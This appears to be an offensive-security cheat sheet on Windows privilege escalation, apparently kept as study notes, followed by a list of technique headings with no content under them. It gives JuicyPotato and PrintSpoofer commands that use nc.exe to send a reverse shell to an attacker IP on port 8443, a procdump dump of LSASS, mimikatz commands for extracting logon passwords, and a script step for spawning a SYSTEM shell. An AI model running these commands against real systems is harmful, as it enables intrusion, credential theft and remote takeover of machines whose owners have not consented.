Privilege Escalation Techniques
SeImpersonate and SeAssignPrimaryToken
c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe ip 8443 -e cmd.exe" -t *

# start a listener on kali and run this command on windows target host
PrintSpoofer.exe -c "c:\tools\nc.exe ip 8443 -e cmd"
SeDebugPrivilege
procdump.exe -accepteula -ma lsass.exe lsass.dmp

# Starting mimikatz
mimikatz.exe

# extracting hashes from lsass.dmp file
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

# First, open an elevated PowerShell console (right-click, run as admin, and type in the credentials for the user).
# Next, type tasklist to get a listing of running processes and accompanying PIDs.
tasklist

# running poc to get system shell, or reverse shell as system
.\psgetsys.ps1
[MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>,"")
SeTakeOwnershipPrivilege
Backup Operators Group / SeBackupPrivilege
Attacking a Domain Controller - Copying NTDS.dit
Event Log Readers Group
DnsAdmins Group
Leveraging DnsAdmins Access
Cleaning Up
Using Mimilib.dll
Print Operators Group
Server Operators Group
Weak Permissions
Permissive File System ACLs
Weak Service Permissions
Cleanup
Unquoted Service Path
Kernel Exploits
Vulnerable Services
Credential Theft
Manually Searching the File System for Credentials
Saved Credentials
Lazagne
Wifi Passwords
Pillaging
Installed Applications
AlwaysInstallElevated
Scheduled Tasks
User/Computer Description Field
Mount VHDX/VMDK